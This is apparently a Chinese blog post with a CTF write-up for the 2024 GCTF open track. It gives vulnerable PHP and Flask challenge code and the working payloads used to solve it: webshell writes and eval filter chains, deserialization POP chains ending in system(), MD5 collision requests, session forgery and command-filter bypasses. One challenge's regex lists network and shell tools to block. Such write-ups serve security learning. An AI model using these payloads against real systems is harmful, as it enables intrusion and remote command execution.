2024赣CTF公开赛道做题记录

已于 2024-11-03 21:13:16 修改
阅读量260 收藏
点赞数 1
文章标签: linux 运维 服务器
于 2024-10-27 17:09:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/shao65308/article/details/143271118
版权

MISC

Canon of Sherlock Holmes

跳舞小人字体:https://zh.fonts2u.com/gl-dancingmen

对照上图,key为:welcom

加密的字符进行颜文解密得:

U2FsdGVkX1/TxK3KY15O+apT3QPSoVJujLDhUPI0c8MbkZT9ejKYz2vaM8HHgtaf
WcnrEnItCxPI6K8mHiJkZA==

AES解密得到flag 

坚持不懈的压缩

zip套娃,借用一个带破解的脚本,修改为固定密码GCTF_yeyeyeye

#!/usr/bin/env bash

while [ -e *.zip ]; do
    files=*.zip;
    for file in $files;do
        echo -n "Crack ${file}........";
        #password="$(fcrackzip -u -l 1-6 -c '1' *.zip |tr -d '\n'|awk -F ' ' '{print $5}')";
        password="GCTF_yeyeyeye";
        if [ -z "${password}" ]; then
            echo "FAIL\!\!\!\!\!";
            break 2;
        fi;
    echo "FOUND PASSWORD : '${password}'";
    unzip -q -P "${password}" "$file";
    rm "${file}";
    done;
done;

WEB

include_me
<?php
highlight_file(__FILE__);

if(isset($_GET['a'])&&file_get_contents($_GET['a'])=='GCTF 2024 has begun'){
    include($_POST['film']);
    echo "where is my flag";
}
else{
    echo "what are you doing?";
}

知识点:data协议,从文件包含到命令执行

https://github.com/synacktiv/php_filter_chain_generator

python3 php_filter_chain_generator.py --chain '<?php eval($_POST[1]); ?>'

 生成webshell,蚁剑连接执行根目录下readflag

php_master
<?php
highlight_file(__FILE__);
error_reporting(0);

$num = $_GET['num'];
if(isset($_GET['num'])){
    if($num==="10086"){
        die("菜就多练");
    }

    if(intval($num,0)==10086){
        $code=$_GET['code'];
        $fffffilm="return $code";
        create_function('',$fffffilm);
    }else{
        die("菜就多多练");
    }
}

/?num=023546&code=;}phpinfo();//

ez_md5
<?php
highlight_file(__file__);
error_reporting(0);

$Game1=$_GET['Game1'];
$Game2=$_GET['Game2'];
if(isset($Game1) && isset($Game2))
{
   if ($Game1!==$Game2 && md5($Game1)==md5($Game2))
   {
      echo "芜湖~";
      if (is_string($_GET['Two1']) && is_string($_GET['Two2']))
      {
         if ($_GET['Two1']!==$_GET['Two2'] && md5($_GET['Two1'])===md5($_GET['Two2']))
         {
            $play="weclome GCTf!";
            echo "芜湖~芜湖~";
            if (is_string($play.$_POST['flag']) && is_string($play.$_POST['f1ag']))
            {
               if ($play.$_POST['flag']!==$play.$_POST['f1ag'] && md5($play.$_POST['flag'])===md5($play.$_POST['f1ag']))
               {
                echo "\n";
                echo "good!";
                echo file_get_contents('/flag');
                
               }
               else
               {
                echo "马上了";
               }
              
           
            }
            else
            {
               echo "就在眼前了";
            }
         }
         else 
         {
            echo "应该快了";
         }
      }
      else
      {
         echo "变了一点";
      }
   }
   else
   {
      echo "不对~不对";
   }
}
else
{
   echo "md5的小游戏";
}

 最后面用到hash碰撞工具:https://github.com/iamjazz/Md5collision

POST /?Game1=240610708&Game2=314282422&Two1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&Two2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2 HTTP/1.1
Host: 42.193.226.63:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: http304ok=1
X-Real-IP: 127.0.0.1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 939

f1ag=%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00L%5D%CF%C4%E9%87O%F5E%D2%BD%ED%F9%EA%A5%12%8Bxv%DC%B5%3B%A1%82%2B%12%3F%FD%D1N%24%B7d%1B%B1%0B%3EKg%F2K%22%3C%3B%04%5EaKK%C6%A1%3B%A1%87%7DLj%1F%EC%CF%0AR%DD%5B%FB%E6k6TQ%8C%2A%A6g%2AMc%A1%DF%FD%82S%0B%97%BF%CEv%1C%10%85%E8%F6%CE%14%7D%CF%E5%CE6N%3C6%26F%BA%8A%11B%97%2C%B6%9F%E8%08%11%2B%A0%CDcNr%24q%D7%7CG%E1c&flag=%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00L%5D%CF%C4%E9%87O%F5E%D2%BD%ED%F9%EA%A5%12%8Bxv%5C%B5%3B%A1%82%2B%12%3F%FD%D1N%24%B7d%1B%B1%0B%3EKg%F2K%22%3C%3B%04%DE%60KK%C6%A1%3B%A1%87%7DLj%1F%ECO%0AR%DD%5B%FB%E6k6TQ%8C%2A%A6g%2AMc%A1%DF%FD%82S%0B%17%BF%CEv%1C%10%85%E8%F6%CE%14%7D%CF%E5%CE6N%3C6%26F%BA%8A%11B%97%AC%B6%9F%E8%08%11%2B%A0%CDcNr%24qW%7CG%E1c
玩会游戏

查看js文件下面有串base64编码提示

6L+Z6YeM6Z2i55qE5Lic6KW/5L2g6IKv5a6a5Zac5qyiOnNoZWxsLnBocA==

这里面的东西你肯定喜欢:shell.php

访问shell.php,get传参?Game=system('cat /flag');拿到flag 

你到底多想要flag???
<?php
highlight_file(__FILE__);
error_reporting(0);
echo '告诉我你有多想flag!';
if(isset($_GET['callme']))
{
    $call_me=$_GET['callme'];
    if(preg_match('/flag/is',$call_me))
    {
        die('你怎么能这么直白的要flag呢?');
    }
    if(stripos($call_me,'flag')===false)
    {
        die('看来你还是不想要flag,连flag都不给我');
    }
    echo '你过了?哦!我知道了,一定是这个。';
    if(isset($_POST['want'])) 
    {
        $call_me_you_want=$_POST['want'];
        if(preg_match('/.+?flag/is',$call_me_you_want))
        {
            die('不够长哦,看来你还是不想要flag!');
        }
        if(!stripos($call_me_you_want,'flag')===true)
        {
            die('我flag呢?');
        }
        echo "好吧,把flag给你吧";
        include("/flag");
        echo $flag;
    }
}
?>

 知识点:preg_match数组绕过,回溯次数限制绕过

import requests
url="http://8.136.110.121:8002/?callme[]=flag"
data={'want':'a'*1000000+'flag'}
res=requests.post(url=url,data=data)
print(res.text)

rceme

利用%0a换行绕过#号备注,再利用__HALT_COMPILER(); 中断编译器的执行绕开后面的拼接字符形式的语法错误,成功执行写websehll,蚁剑连在env环境变量中得到flag

?cmd=%0afile_put_contents('shell3.php', base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4='));__HALT_COMPILER();

 ez_pop

地址引用绕过__warkup()

<?php
error_reporting(0);
class Start{
    public $a;
    public $b;
    public $name;

    public function __wakeup(){
        $this->name="hacker";
        $this->a = $this->b;
    }

    public function __destruct(){
        echo 'Get out!'.$this->name;
    }
}

class BE{
    public $first;
    public $var;

    public function __toString(){
        unset($this->first->{$this->var});
        return "ctfer";
    }
}

class CA{
    public $second;
    public $function;

    public function __unset($parameter){
        echo '__unset';
        return $this->second->{$this->function}($parameter);
    }
}
class ON{
    function getflag($a){
        system($a);
    }
}

$a=new Start;
$b=new BE;
$c=new CA;
$d=new ON;
$c->second=$d;
$c->function='getflag';
$b->first=$c;
$b->var='env';

$a->b=$b;
$a->a=&$a->name;

echo serialize($a);

?beacon=O:5:"Start":3:{s:1:"a";N;s:1:"b";O:2:"BE":2:{s:5:"first";O:2:"CA":2:{s:6:"second";O:2:"ON":0:{}s:8:"function";s:7:"getflag";}s:3:"var";s:3:"env";}s:4:"name";R:2;}

ez_flask
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode

def decryption(payload):
    payload, sig = payload.rsplit(b'.', 1)
    payload, timestamp = payload.rsplit(b'.', 1)

    decompress = False
    if payload.startswith(b'.'):
        payload = payload[1:]
        decompress = True

    try:
        payload = base64_decode(payload)
    except Exception as e:
        raise Exception('Could not base64 decode the payload because of '
                         'an exception')

    if decompress:
        try:
            payload = zlib.decompress(payload)
        except Exception as e:
            raise Exception('Could not zlib decompress the payload before '
                             'decoding the payload')

    return session_json_serializer.loads(payload)

if __name__ == '__main__':
    s = "eyJhZG1pbiI6MCwidXNlcm5hbWUiOiJhZG1pbiJ9.ZyVfcQ.RW8FOdf7sUlVVlwulZskfvgww3s"
    print(decryption(s.encode()))

爆破secret

https://github.com/Paradoxis/Flask-Unsign

flask-unsign --unsign --cookie eyJhZG1pbiI6MCwidXNlcm5hbWUiOiJhZG1pbiJ9.ZyVfcQ.RW8FOdf7sUlVVlwulZskfvgww3s

伪造session

https://github.com/noraj/flask-session-cookie-manager

解密:python flask_session_cookie_manager3.py decode -s “secret_key” -c “需要解密的session值”
加密:python flask_session_cookie_manager3.py encode -s “secret_key” -t “需要加密的session值”

python3 flask_session_cookie_manager3.py encode -s 103.025665766 -t "{'admin': 1, 'username': 'admin'}"

xxxxxx
<?php
error_reporting(0);
highlight_file(__FILE__);
function check($string){
    return preg_replace("/Good|Tou|pluto|fewOo|just_do|feng/" ,'', $string);
}
$User['username'] = $_POST['name'];
$User['password'] = $_POST['passwd'];
$User['sign'] = 'dddd';

$Fin = check(serialize($User));
if(unserialize($Fin)[sign] == "GCTF"){
    echo file_get_contents('/flag');
}

 name=GoodGoodTouGoodGoodTou&passwd=;s:8:"password";s:1:"b";s:4:"sign";s:4:"GCTF";}

ezphp

preg_replace命令执行

<?php

highlight_file(__FILE__);
error_reporting(0);
$a=$_POST['a'];
$b=$_POST['b'];
$c=$_POST['c'];
if($a!=$b && md5($a)==md5($b)){
    echo 'next'.'<br>';
    if(preg_match('/^nihao$/', $_GET['A_a_B.b']) && $_GET['A_a_B.b'] !='nihao' && !preg_match('/[0-9]/', $c) && intval($c)){
        echo 'give you'.'<br>';
        echo preg_replace($_GET['a'],$_GET['b'],$_GET['c']);
    }
}

?>

 /?A[a_B.b=nihao%0a&a=/test/e&b=system('cat flag')&c=test

a=240610708&b=QNKCDZO&c[]=\xff

xxxxxxxxx
 <?php
show_source(__FILE__);
$man=$_GET['m_a.n'];
$damn=$_POST['DDDaaammmnnn'];
if (isset($damn)&&isset($man)&&!preg_match('/\\$|\!|\@|\#|\%|\\|\/|\^|\&|\?|\{|\}|\>|\<|nc|tee|sort|wget|php|n|l|nl|exec|bash|sh|netcat|find|flag|grep|base64|curl|wget|gcc|python|ping|touch|mv|mkdir|rm|cat|tac|cp|na|nt|strlen|info|path|bin|hex/i',$damn)){
    system($damn);
}
else{
    echo '不准打我';
}

GET:?m[a.n=

POST:

DDDaaammmnnn=`echo ZW52|b\ase64 -d`

DDDaaammmnnn=export

shao65308
关注
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值